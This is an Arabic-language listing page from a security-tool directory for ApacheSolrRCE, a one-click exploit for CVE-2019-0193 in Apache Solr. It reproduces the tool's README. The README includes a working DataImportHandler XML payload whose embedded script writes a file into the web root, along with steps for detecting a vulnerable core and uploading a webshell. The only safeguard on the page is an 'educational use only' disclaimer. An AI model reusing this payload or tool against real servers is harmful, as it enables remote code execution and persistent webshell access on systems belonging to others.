Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
ApacheSolrRCE — ApacheSolrRCE(CVE-2019-0193)ثغرة لكتابة شل بنقرة واحدة، المبدأ هو كتابة حصان من خلال تدفق ملف جافا يتم تنفيذه عبر الكود. | Kitploit
أدوات/GitHubGitHub/freefv/apachesolrrce
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubfreefv/apachesolrrce

ApacheSolrRCE

ApacheSolrRCE(CVE-2019-0193)ثغرة لكتابة شل بنقرة واحدة، المبدأ هو كتابة حصان من خلال تدفق ملف جافا يتم تنفيذه عبر الكود.

عرض المستودع
1منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

بيان المشروع

للاستخدام التعليمي والأكاديمي فقط في مجال أمن المعلومات، ولا تستخدمه للاختبارات أو الهجمات غير القانونية.

ApacheSolrRCE

ApacheSolrRCE (CVE-2019-0193) يكتب شيل بنقرة واحدة، المبدأ هو كتابة حصان طروادة عبر تدفق ملف جافا يتم تنفيذه بواسطة الكود.

ملاحظة: المؤلف مبتدئ نسبيًا، إذا وجدت أخطاء أو لديك احتياجات أخرى، فقم بتنزيل الكود وتعديله بنفسك.

شرح الأداة

نظرًا لأن الـ payloads المتداولة على الإنترنت كلها لتنفيذ الأوامر، وليس من السهل تحميل webshell، لذلك كتبت هذا الـ payload (عند عرض 123456، فهذا يعني أن الكتابة تمت بنجاح).

ملاحظة: الأداة تساعد فقط في الاختبار، إذا لم تتمكن الأداة من الكتابة، يُنصح بالكتابة يدويًا.

root@kitploit:~
<dataConfig>
<dataSource name="streamsrc" type="ContentStreamDataSource" loggerLevel="TRACE" />
  <script><![CDATA[
          function poc(row){
var buf = new java.io.BufferedWriter(new java.io.FileWriter(java.net.URLDecoder.decode(java.lang.Thread.currentThread().getContextClassLoader().getResource("").getPath().toString().replaceAll("file:\/", "").split("WEB-INF")[0]+"1.txt")));buf.write(new java.lang.String(java.util.Base64.getDecoder().decode("MTIzNDU2")));buf.close();
row.put("title",123456);
return row;

}

]]></script>

<document>
    <entity
        stream="true"
        name="entity1"
        datasource="streamsrc1"
        processor="XPathEntityProcessor"
        rootEntity="true"
        forEach="/RDF/item"
        transformer="script:poc">
             <field column="title" xpath="/RDF/item/title" />
    </entity>
</document>
</dataConfig>

استخدام الأداة

أولاً اضغط على 'الكشف' للحصول على core، وتحديد ما إذا كان هناك ثغرة.

ثم اضغط على 'getshell'.

ملاحظة: ضع webshell الخاص بك في مجلد shell، وستقوم الأداة بتحميلها تلقائيًا إلى القائمة المنسدلة.

الوكيل الافتراضي هو وكيل HTTP، المنفذ 8080، وهو محدد في الكود، يمكنك تعديله عن طريق إعادة الترجمة إذا كنت بحاجة.

شكر خاص

solr_exploit

تنزيل الأداة